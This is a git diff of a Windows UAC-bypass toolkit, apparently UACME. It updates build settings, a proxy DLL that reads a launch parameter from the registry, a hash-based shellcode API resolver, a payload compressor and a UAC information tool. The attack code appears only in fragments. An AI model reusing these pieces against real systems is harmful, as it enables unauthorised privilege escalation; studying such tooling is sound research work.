<TargetName>$(ProjectName)32</TargetName>
<CodeAnalysisRuleSet>SecurityRules.ruleset</CodeAnalysisRuleSet>
<EmbedManifest>false</EmbedManifest>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
@ -82,20 +83,23 @@
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
<TargetName>$(ProjectName)64</TargetName>
<CodeAnalysisRuleSet>SecurityRules.ruleset</CodeAnalysisRuleSet>
<EmbedManifest>false</EmbedManifest>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
<TargetName>$(ProjectName)32</TargetName>
<CodeAnalysisRuleSet>SecurityRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<EmbedManifest>false</EmbedManifest>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
<TargetName>$(ProjectName)64</TargetName>
<CodeAnalysisRuleSet>SecurityRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<EmbedManifest>false</EmbedManifest>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
@ -109,6 +113,7 @@
<BufferSecurityCheck>false</BufferSecurityCheck>
<CompileAs>CompileAsC</CompileAs>
<RuntimeLibrary>MultiThreadedDLL</RuntimeLibrary>
<AdditionalIncludeDirectories>$(SolutionDir)</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
@ -130,6 +135,7 @@
<BufferSecurityCheck>false</BufferSecurityCheck>
<CompileAs>CompileAsC</CompileAs>
<RuntimeLibrary>MultiThreadedDLL</RuntimeLibrary>
<AdditionalIncludeDirectories>$(SolutionDir)</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
@ -154,6 +160,7 @@
<BufferSecurityCheck>false</BufferSecurityCheck>
<CompileAs>CompileAsC</CompileAs>
<RuntimeLibrary>MultiThreadedDLL</RuntimeLibrary>
<AdditionalIncludeDirectories>$(SolutionDir)</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
@ -165,6 +172,9 @@
<SetChecksum>true</SetChecksum>
<ModuleDefinitionFile>export.def</ModuleDefinitionFile>
</Link>
<PostBuildEvent>
<Command>\Utils\StripDebug.exe .\output\$(Platform)\$(Configuration)\$(ProjectName)32.dll</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
@ -181,6 +191,7 @@
<BufferSecurityCheck>false</BufferSecurityCheck>
<CompileAs>CompileAsC</CompileAs>
<RuntimeLibrary>MultiThreadedDLL</RuntimeLibrary>
<AdditionalIncludeDirectories>$(SolutionDir)</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
@ -192,6 +203,9 @@
<SetChecksum>true</SetChecksum>
<ModuleDefinitionFile>export.def</ModuleDefinitionFile>
</Link>
<PostBuildEvent>
<Command>\Utils\StripDebug.exe .\output\$(Platform)\$(Configuration)\$(ProjectName)64.dll</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="..\Shared\_filename.c" />

4
Source/Ikazuchi/Ikazuchi.vcxproj.user Normal file
View File

@ -0,0 +1,4 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup />
</Project>

68
Source/Ikazuchi/dllmain.c
View File

@ -1,12 +1,12 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2016
* (C) COPYRIGHT AUTHORS, 2016 - 2017
*
* TITLE: DLLMAIN.C
*
* VERSION: 2.50
* VERSION: 2.57
*
* DATE: 07 July 2016
* DATE: 07 Mar 2017
*
* Proxy dll entry point, Ikazuchi.
*
@ -29,10 +29,10 @@
#pragma warning(disable: 6102) // Using %s from failed function call at line %u
#include <windows.h>
#include "..\Shared\ntos.h"
#include "shared\ntos.h"
#include <ntstatus.h>
#include "..\shared\minirtl.h"
#include "..\Shared\_filename.h"
#include "shared\minirtl.h"
#include "shared\_filename.h"
#if (_MSC_VER >= 1900)
#ifdef _DEBUG
@ -43,7 +43,18 @@
#endif
#endif
#define T_SXS_DIRECTORY L"\\\\?\\globalroot\\systemroot\\winsxs\\"
#define SXS_DIRECTORY_LENGTH sizeof(T_SXS_DIRECTORY) - sizeof(WCHAR)
#define T_REGISTRY_USER L"\\REGISTRY\\USER\\"
#define REGISTRY_USER_LENGTH sizeof(T_REGISTRY_USER) - sizeof(WCHAR)
#define T_AKAGI_KEY L"Software\\Akagi"
#define AKAGI_KEY_LENGTH sizeof(T_AKAGI_KEY) - sizeof(WCHAR)
#define T_COMCTL32_SLASH L"\\comctl32.dll"
#define COMCTL32_SLASH_LENGTH sizeof(T_COMCTL32_SLASH) - sizeof(WCHAR)
#define T_AKAGI_PARAM L"LoveLetter"
#define COMCTL32_SXS L"microsoft.windows.common-controls"
#define COMCTL32_DLL L"comctl32.dll"
@ -52,7 +63,7 @@ typedef NTSTATUS(NTAPI *PENUMOBJECTSCALLBACK)(POBJECT_DIRECTORY_INFORMATION Entr
typedef struct _OBJSCANPARAM {
PWSTR Buffer;
ULONG BufferSize;
SIZE_T BufferSize;
} OBJSCANPARAM, *POBJSCANPARAM;
typedef struct _SXS_SEARCH_CONTEXT {
@ -179,6 +190,7 @@ NTSTATUS NTAPI supDetectObjectCallback(
_In_ PVOID CallbackParam
)
{
SIZE_T BufferSize;
POBJSCANPARAM Param = (POBJSCANPARAM)CallbackParam;
if (Entry == NULL) {
@ -189,17 +201,18 @@ NTSTATUS NTAPI supDetectObjectCallback(
return STATUS_INVALID_PARAMETER_2;
}
if (Param->Buffer == NULL || Param->BufferSize == 0) {
return STATUS_MEMORY_NOT_ALLOCATED;
}
if (Entry->Name.Buffer) {
BufferSize = Entry->Name.Length + sizeof(UNICODE_NULL);
Param->Buffer = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, BufferSize);
if (Param->Buffer) {
Param->BufferSize = BufferSize;
_strncpy(
Param->Buffer, Param->BufferSize / sizeof(WCHAR),
Entry->Name.Buffer, Param->BufferSize / sizeof(WCHAR)
Entry->Name.Buffer, Entry->Name.Length / sizeof(WCHAR)
);
return STATUS_SUCCESS;
}
}
return STATUS_UNSUCCESSFUL;
}
@ -327,15 +340,18 @@ HRESULT WINAPI TaskDialogIndirectForward(
if (lpszDirectoryName == NULL)
break;
sz = 0x1000 + (_strlen(lpszDirectoryName) * sizeof(WCHAR));
sz = SXS_DIRECTORY_LENGTH + COMCTL32_SLASH_LENGTH + ((1 + _strlen(lpszDirectoryName)) * sizeof(WCHAR));
NtAllocateVirtualMemory(NtCurrentProcess(), &lpSxsPath, 0, &sz, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (lpSxsPath == NULL)
break;
_strcpy(lpSxsPath, L"\\\\?\\globalroot\\systemroot\\winsxs\\");
_strcpy(lpSxsPath, T_SXS_DIRECTORY);
_strcat(lpSxsPath, lpszDirectoryName);
_strcat(lpSxsPath, L"\\comctl32.dll");
_strcat(lpSxsPath, T_COMCTL32_SLASH);
DllName.Buffer = NULL;
DllName.Length = 0;
DllName.MaximumLength = 0;
RtlInitUnicodeString(&DllName, lpSxsPath);
if (NT_SUCCESS(LdrLoadDll(NULL, NULL, &DllName, &hLib))) {
if (hLib) {
@ -389,39 +405,34 @@ BOOL ucmQueryCustomParameter(
STARTUPINFOW startupInfo;
PROCESS_INFORMATION processInfo;
ULONG bytesIO = 0L;
WCHAR szBuffer[MAX_PATH * 2];
OBJSCANPARAM Param;
do {
RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
Param.Buffer = szBuffer;
Param.BufferSize = sizeof(szBuffer);
Param.Buffer = NULL;
Param.BufferSize = 0;
status = supEnumSystemObjects(L"\\Rpc Control\\Akagi", NULL,
supDetectObjectCallback, &Param);
if (!NT_SUCCESS(status))
break;
RtlSecureZeroMemory(&usKey, sizeof(usKey));
RtlInitUnicodeString(&usKey, szBuffer);
memIO = 0x1000 + (_strlen(szBuffer) * sizeof(WCHAR));
if ((Param.Buffer == NULL) || (Param.BufferSize == 0))
break;
memIO = MAX_PATH + Param.BufferSize + REGISTRY_USER_LENGTH + AKAGI_KEY_LENGTH;
lpszParamKey = RtlAllocateHeap(ProcessHeap, HEAP_ZERO_MEMORY, memIO);
if (lpszParamKey == NULL)
break;
_strcpy_w(lpszParamKey, L"\\REGISTRY\\USER\\");
_strcat_w(lpszParamKey, usKey.Buffer);
_strcpy_w(lpszParamKey, T_REGISTRY_USER);
_strcat_w(lpszParamKey, Param.Buffer);
_strcat_w(lpszParamKey, L"\\");
_strcat_w(lpszParamKey, T_AKAGI_KEY);
RtlSecureZeroMemory(&usKey, sizeof(usKey));
RtlInitUnicodeString(&usKey, lpszParamKey);
InitializeObjectAttributes(&obja, &usKey, OBJ_CASE_INSENSITIVE, NULL, NULL);
status = NtOpenKey(&hKey, KEY_ALL_ACCESS, &obja);
if (!NT_SUCCESS(status)) {
break;
@ -473,6 +484,9 @@ BOOL ucmQueryCustomParameter(
NtDeleteKey(hKey);
NtClose(hKey);
}
if (Param.Buffer != NULL) {
RtlFreeHeap(ProcessHeap, 0, Param.Buffer);
}
if (lpszParamKey != NULL) {
RtlFreeHeap(ProcessHeap, 0, lpszParamKey);
}

BIN
Source/Ikazuchi/version.rc
View File

Binary file not shown.

10
Source/Inazuma/Inazuma.vcxproj
View File

@ -46,6 +46,7 @@
<TargetName>$(ProjectName)32</TargetName>
<GenerateManifest>false</GenerateManifest>
<CodeAnalysisRuleSet>SecurityRules.ruleset</CodeAnalysisRuleSet>
<EmbedManifest>false</EmbedManifest>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
@ -53,18 +54,20 @@
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
<TargetName>$(ProjectName)32</TargetName>
<GenerateManifest>false</GenerateManifest>
<CodeAnalysisRuleSet>SecurityRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<EmbedManifest>false</EmbedManifest>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<WarningLevel>Level4</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>
</SDLCheck>
<BufferSecurityCheck>false</BufferSecurityCheck>
<AdditionalIncludeDirectories>$(SolutionDir)</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
@ -74,7 +77,7 @@
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<WarningLevel>Level4</WarningLevel>
<PrecompiledHeader>
</PrecompiledHeader>
<Optimization>MaxSpeed</Optimization>
@ -85,6 +88,7 @@
</SDLCheck>
<BufferSecurityCheck>false</BufferSecurityCheck>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
<AdditionalIncludeDirectories>$(SolutionDir)</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>

32
Source/Inazuma/main.c
View File

@ -1,12 +1,12 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2015
* (C) COPYRIGHT AUTHORS, 2015 - 2017
*
* TITLE: MAIN.C
*
* VERSION: 1.90
* VERSION: 2.57
*
* DATE: 16 Sept 2015
* DATE: 06 Mar 2017
*
* ShellCode.
*
@ -21,7 +21,7 @@
#pragma warning(disable: 4005) // macro redefinition
#include <Windows.h>
#include "..\Shared\ntos.h"
#include "shared\ntos.h"
#if (_MSC_VER >= 1900)
#ifdef _DEBUG
@ -35,6 +35,14 @@
typedef HMODULE(WINAPI *pfnLoadLibraryA)(LPCSTR lpLibFileName);
typedef DWORD(WINAPI *pfnExpandEnvironmentStringsA)(LPCSTR lpSrc, LPSTR lpDst, DWORD nSize);
/*
* gethash
*
* Purpose:
*
* Used in shellcode, calculates specific hash for string.
*
*/
DWORD gethash(char *s)
{
DWORD h = 0;
@ -48,6 +56,14 @@ DWORD gethash(char *s)
return h;
}
/*
* rawGetProcAddress
*
* Purpose:
*
* GetProcAddress small implementation for shellcode.
*
*/
PVOID rawGetProcAddress(PVOID Module, DWORD hash)
{
PIMAGE_DOS_HEADER dosh = (PIMAGE_DOS_HEADER)Module;
@ -69,6 +85,14 @@ PVOID rawGetProcAddress(PVOID Module, DWORD hash)
return NULL;
}
/*
* main
*
* Purpose:
*
* Shellcode entry point.
*
*/
void main()
{
PTEB teb = (PTEB)__readfsdword(0x18);

14
Source/Naka/Naka.vcxproj
View File

@ -88,14 +88,14 @@
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
<TargetName>$(ProjectName)32</TargetName>
<CodeAnalysisRuleSet>SecurityRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
<OutDir>.\output\$(Platform)\$(Configuration)\</OutDir>
<IntDir>.\output\$(Platform)\$(Configuration)\</IntDir>
<TargetName>$(ProjectName)64</TargetName>
<CodeAnalysisRuleSet>SecurityRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
@ -105,6 +105,7 @@
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
<AdditionalIncludeDirectories>$(SolutionDir)</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
@ -120,6 +121,7 @@
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>_DEBUG;_WINDOWS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
<AdditionalIncludeDirectories>$(SolutionDir)</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
@ -138,6 +140,7 @@
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
<CompileAs>CompileAsC</CompileAs>
<AdditionalIncludeDirectories>$(SolutionDir)</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
@ -147,6 +150,9 @@
<SetChecksum>true</SetChecksum>
<EntryPointSymbol>main</EntryPointSymbol>
</Link>
<PostBuildEvent>
<Command>\Utils\StripDebug.exe .\output\$(Platform)\$(Configuration)\$(ProjectName)32.exe</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
@ -159,6 +165,7 @@
<PreprocessorDefinitions>NDEBUG;_WINDOWS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
<CompileAs>CompileAsC</CompileAs>
<AdditionalIncludeDirectories>$(SolutionDir)</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
@ -168,6 +175,9 @@
<SetChecksum>true</SetChecksum>
<EntryPointSymbol>main</EntryPointSymbol>
</Link>
<PostBuildEvent>
<Command>\Utils\StripDebug.exe .\output\$(Platform)\$(Configuration)\$(ProjectName)64.exe</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="..\Shared\strtoul.c" />

15
Source/Naka/main.c
View File

@ -1,12 +1,12 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2016
* (C) COPYRIGHT AUTHORS, 2016 - 2017
*
* TITLE: MAIN.C
*
* VERSION: 2.51
* VERSION: 2.57
*
* DATE: 10 July 2016
* DATE: 07 Mar 2017
*
* Naka, support payload compressor.
*
@ -41,10 +41,10 @@
#include <Windows.h>
#include <ntstatus.h>
#include "..\shared\ntos.h"
#include "..\shared\minirtl.h"
#include "..\Shared\cmdline.h"
#include "..\Shared\_filename.h"
#include "shared\ntos.h"
#include "shared\minirtl.h"
#include "shared\cmdline.h"
#include "shared\_filename.h"
ULONG g_XorKey = 'naka';
@ -189,6 +189,7 @@ PUCHAR CompressBufferLZNT1(
if (status != STATUS_SUCCESS) {
VirtualFree(CompBuffer, 0, MEM_RELEASE);
CompBuffer = NULL;
break;
}

87
Source/Shared/ntos.h
View File

@ -4,9 +4,9 @@
*
* TITLE: NTOS.H
*
* VERSION: 1.59
* VERSION: 1.60
*
* DATE: 28 Feb 2017
* DATE: 02 Mar 2017
*
* Common header file for the ntos API functions and definitions.
*
@ -5202,6 +5202,89 @@ NTSTATUS NTAPI RtlQueryElevationFlags(
** UAC Elevation END
*/
/*
* Memory parition START
*/
typedef enum _MEMORY_PARTITION_INFORMATION_CLASS {
SystemMemoryPartitionInformation = 0,
SystemMemoryPartitionMoveMemory = 1,
SystemMemoryPartitionAddPagefile = 2,
SystemMemoryPartitionCombineMemory = 3,
SystemMemoryPartitionInitialAddMemory = 4
} MEMORY_PARTITION_INFORMATION_CLASS;
typedef struct _MEMORY_PARTITION_PAGE_RANGE {
ULONG_PTR StartPage;
ULONG_PTR NumberOfPages;
} MEMORY_PARTITION_PAGE_RANGE, *PMEMORY_PARTITION_PAGE_RANGE;
typedef struct _MEMORY_PARTITION_INITIAL_ADD_INFORMATION {
ULONG Flags;
ULONG NumberOfRanges;
ULONG_PTR NumberOfPagesAdded;
MEMORY_PARTITION_PAGE_RANGE PartitionRanges[1];
} MEMORY_PARTITION_INITIAL_ADD_INFORMATION, *PMEMORY_PARTITION_INITIAL_ADD_INFORMATION;
typedef struct _MEMORY_PARTITION_PAGE_COMBINE_INFORMATION {
PVOID StopHandle;
ULONG Flags;
ULONG_PTR TotalNumberOfPages;
} MEMORY_PARTITION_PAGE_COMBINE_INFORMATION, *PMEMORY_PARTITION_PAGE_COMBINE_INFORMATION;
typedef struct _MEMORY_PARTITION_PAGEFILE_INFORMATION {
UNICODE_STRING PageFileName;
LARGE_INTEGER MinimumSize;
LARGE_INTEGER MaximumSize;
ULONG Flags;
} MEMORY_PARTITION_PAGEFILE_INFORMATION, *PMEMORY_PARTITION_PAGEFILE_INFORMATION;
typedef struct _MEMORY_PARTITION_TRANSFER_INFORMATION {
ULONG_PTR NumberOfPages;
ULONG NumaNode;
ULONG Flags;
} MEMORY_PARTITION_TRANSFER_INFORMATION, *PMEMORY_PARTITION_TRANSFER_INFORMATION;
typedef struct _MEMORY_PARTITION_CONFIGURATION_INFORMATION {
ULONG Flags;
ULONG NumaNode;
ULONG Channel;
ULONG NumberOfNumaNodes;
ULONG_PTR ResidentAvailablePages;
ULONG_PTR CommittedPages;
ULONG_PTR CommitLimit;
ULONG_PTR PeakCommitment;
ULONG_PTR TotalNumberOfPages;
ULONG_PTR AvailablePages;
ULONG_PTR ZeroPages;
ULONG_PTR FreePages;
ULONG_PTR StandbyPages;
} MEMORY_PARTITION_CONFIGURATION_INFORMATION, *PMEMORY_PARTITION_CONFIGURATION_INFORMATION;
NTSTATUS NTAPI NtOpenPartition(
_Out_ PHANDLE PartitionHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_ POBJECT_ATTRIBUTES ObjectAttributes
);
NTSTATUS NTAPI NtManagePartition(
_In_ MEMORY_PARTITION_INFORMATION_CLASS PartitionInformationClass,
_Inout_ PVOID PartitionInformation,
_In_ ULONG PartitionInformationLength
);
NTSTATUS NTAPI NtCreatePartition(
_Out_ PHANDLE PartitionHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
_In_ ULONG PreferredNode
);
/*
* Memory partition END
*/
/*
** Native API START
*/

BIN
Source/Yuubari/Resource.rc
View File

Binary file not shown.

2
Source/Yuubari/Yuubari.vcxproj
View File

@ -64,6 +64,7 @@
<PreprocessorDefinitions>_DEBUG;_WINDOWS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
<CompileAs>CompileAsC</CompileAs>
<AdditionalIncludeDirectories>$(ProjectDir)</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
@ -86,6 +87,7 @@
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<ControlFlowGuard>Guard</ControlFlowGuard>
<MultiProcessorCompilation>true</MultiProcessorCompilation>
<AdditionalIncludeDirectories>$(ProjectDir)</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>

10
Source/Yuubari/appinfo.c
View File

@ -4,9 +4,9 @@
*
* TITLE: APPINFO.C
*
* VERSION: 1.10
* VERSION: 1.21
*
* DATE: 19 Feb 2017
* DATE: 04 Mar 2017
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
@ -30,18 +30,14 @@ pfnSymUnloadModule64 pSymUnloadModule64 = NULL;
pfnSymFromAddrW pSymFromAddrW = NULL;
pfnSymCleanup pSymCleanup = NULL;
//
// Should be = supported Windows builds
//
#define SUPPORTED_PATTERNS_COUNT 6
UAC_PATTERN g_MmcPatterns[SUPPORTED_PATTERNS_COUNT] = {
{ ptMmcBlock_7600, sizeof(ptMmcBlock_7600), 7600, 7600 },
{ ptMmcBlock_7601, sizeof(ptMmcBlock_7601), 7601, 7601 },
{ ptMmcBlock_9200, sizeof(ptMmcBlock_9200), 9200, 9200 },
{ ptMmcBlock_9600, sizeof(ptMmcBlock_9600), 9600, 9600 },
{ ptMmcBlock_10240, sizeof(ptMmcBlock_10240), 10240, 10240 },
{ ptMmcBlock_10586_15046, sizeof(ptMmcBlock_10586_15046), 10586, 15046 }
{ ptMmcBlock_10586_15048, sizeof(ptMmcBlock_10586_15048), 10586, 15048 }
};
#define TestChar(x) ((x >= L'A') && (x <= L'z'))

6
Source/Yuubari/consts.h
View File

@ -4,9 +4,9 @@
*
* TITLE: CONSTS.H
*
* VERSION: 1.20
* VERSION: 1.21
*
* DATE: 01 Mar 2017
* DATE: 02 Mar 2017
*
* Global consts definition file.
*
@ -33,7 +33,7 @@
#define T_FLAG_INSTALLERDETECT_ENABLED TEXT("InstallerDetectEnabled")
#define T_PROGRAM_NAME TEXT("Yuubari")
#define T_PROGRAM_TITLE TEXT("[UacView] UAC information gathering tool, v1.2.0 (01/03/2017)\n")
#define T_PROGRAM_TITLE TEXT("[UacView] UAC information gathering tool, v1.2.1 (02/03/2017)\n")
#define T_HELP TEXT("Optional parameters to execute: \n\n\r\
YUUBARI [/v] \n\n\r\

4
Source/Yuubari/main.c
View File

@ -4,9 +4,9 @@
*
* TITLE: MAIN.C
*
* VERSION: 1.20
* VERSION: 1.21
*
* DATE: 01 Mar 2017
* DATE: 07 Mar 2017
*
* Program entry point.
*

8
Source/Yuubari/patterns.h
View File

@ -4,15 +4,15 @@
*
* TITLE: PATTERNS.H
*
* VERSION: 1.20
* VERSION: 1.21
*
* DATE: 01 Mar 2017
* DATE: 04 Mar 2017
*
* Patterns for supported AppInfo versions.
*
* Minimum client: 7600
*
* Maximum client: 15046
* Maximum client: 15048
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
@ -41,7 +41,7 @@ unsigned char ptMmcBlock_9600[] = {
unsigned char ptMmcBlock_10240[] = {
0x49, 0x8B, 0x14, 0x24, 0x49, 0x8B, 0xCE, 0xFF, 0x15
};
unsigned char ptMmcBlock_10586_15046[] = {
unsigned char ptMmcBlock_10586_15048[] = {
0x49, 0x8B, 0x16, 0x49, 0x8B, 0xCD, 0xFF, 0x15
};

8
Source/Yuubari/tests/test_fusion.c
View File

@ -4,9 +4,9 @@
*
* TITLE: TEST_FUSION.C
*
* VERSION: 1.10
* VERSION: 1.21
*
* DATE: 20 Feb 2017
* DATE: 03 Mar 2017
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
@ -14,8 +14,8 @@
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "..\global.h"
#include "..\fusion.h"
#include "global.h"
#include "fusion.h"
BYTE TestArray[1024 * 32] = { 0 };

1
Source/uacme.sln
View File

@ -22,6 +22,7 @@ Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "shared", "shared", "{49552A
Shared\cmdline.c = Shared\cmdline.c
shared\minirtl.h = shared\minirtl.h
shared\ntos.h = shared\ntos.h
Shared\ntsxs.h = Shared\ntsxs.h
shared\rtltypes.h = shared\rtltypes.h
Shared\strtoul.c = Shared\strtoul.c
EndProjectSection

89
UACME.sha256
View File

@ -1,8 +1,8 @@
2b2fcde2f1ae5876945bd2ec066016d18d9461a99eca70b5a1c597a95575ccd7 *Compiled\Akagi32.exe
8e9687f9d47757e9c97f17d2e4f05cdd5810ff696290261da8ce9dd1ae505e4f *Compiled\Akagi64.exe
bc7b0c12581633eae06b6f5c4ac6d97a8ad061383e6909f43037856a497b3138 *Compiled\UacInfo64.exe
c3aadb6fb35a7bcf5855706b10e993f068828417ab7d3e12da90f0ad7b70f1f2 *Compiled\Akagi32.exe
38149f3b29758b855354bab50beb4e910cce9f2b5cfa393e940e4618eaf1cb76 *Compiled\Akagi64.exe
b6566783e023d055c31830ce754ea806cc3e4da856dc016264db16013cd8929d *Compiled\UacInfo64.exe
c7aa5be04dbf1ffdd076120a617eb5e7ea154a37f5811de5b30fa006c69a4c7c *Compiled\Symdll\readme1st.txt
9a7fcbc8cbd7b8a875f828e45f1813847c9daa52bbe63864154f71ed53a056fb *Source\uacme.sln
39cd224f1349523f193b0bd95ccae5d6ee31dbd625aae5b4ab91cca2bdeb69c7 *Source\uacme.sln
8172069709954a5616b75306e565cbc5cd5baada00c15cba084420e61bebcdaf *Source\Akagi\akagi.ico
02238b1720b8514de36ae80fa3d07c377d22e6befe99a7b87d4da9d60d23be02 *Source\Akagi\akagi.manifest
270efb0d86f638f7978ceeeacdcd8addc793933b8915c193623c4e9efedfb05d *Source\Akagi\apphelp.h
@ -13,78 +13,81 @@ b5158a54a382d5d219af835d6664525b54bc30bbb4999ed73741a4731e8db040 *Source\Akagi\b
65ca05df060b36704e38db08c0c56a358c4c73145a690f0713bb1c5560fc0a98 *Source\Akagi\carberp.c
35ed70e08dc96bedc4d332edb36799fcee7fe8b743bce7b43a363aacfdb8dc78 *Source\Akagi\carberp.h
3163a5938ab4f15082f0960e30f39d29bd5a120e692134db8a7da2ea6c6b1978 *Source\Akagi\comet.c
ba15ec03e68f87b0e1b86ff826b1b42886aac497d0bc7aca8753e5d3ffdb1693 *Source\Akagi\comet.h
f08a3e73e61836aa5a77441f75f6c0798512b5e949f84aa2caef0646c70005b4 *Source\Akagi\compress.c
888f884ca226ac9c1f615496f70fd4e9e03976f40de3a4026b4f9cdbc92347d9 *Source\Akagi\comet.h
b8e8bcfcec9529c1aa34bb1d1b19e66f7ef157962e65eb390c54705accc78126 *Source\Akagi\compress.c
be3ecc4805c0c88ef53364c54448b13d19ddd1a31562602dbdca2457237a9e81 *Source\Akagi\compress.h
27c861254f565093f5b30d03640121bb3bd4a8d0e7b4b627dc33eee0e8dc8f2e *Source\Akagi\consts.h
b91747dbb9928504618194423d1d2d0a32f7fd2c4d0233778bc48c121ba98ba2 *Source\Akagi\enigma0x3.c
6081ff03b89f37e46e378ce0258336ad5451fc821c4fc7da5ddfa5c92b5db0cd *Source\Akagi\enigma0x3.c
362c2c8c0aeb6ed6396fffb1d06f5b83ac03b74c75845da0cab4702311863520 *Source\Akagi\enigma0x3.h
682b685196d19eaaecdd73f371515cea13ef67ae34dd1f6ecb3d711e29e0e42f *Source\Akagi\explife.c
425bd2ffc4dcd71ed5dac01f31236cdc80ab5ca5c77e211b3c58c48adead3da6 *Source\Akagi\explife.c
f4315ba7926b6a73a497b1dad53bb47509f43fb20009cee051ca065f41cb3417 *Source\Akagi\explife.h
a06795ff3509f2d02a6e3ca3e675d306e7c9669e6b87e6e1d2f14d6f149245e3 *Source\Akagi\global.h
ed2d2dd8f192251a608bb98d51f09bc2f792494c79330d6d9184e1806e3513bc *Source\Akagi\global.h
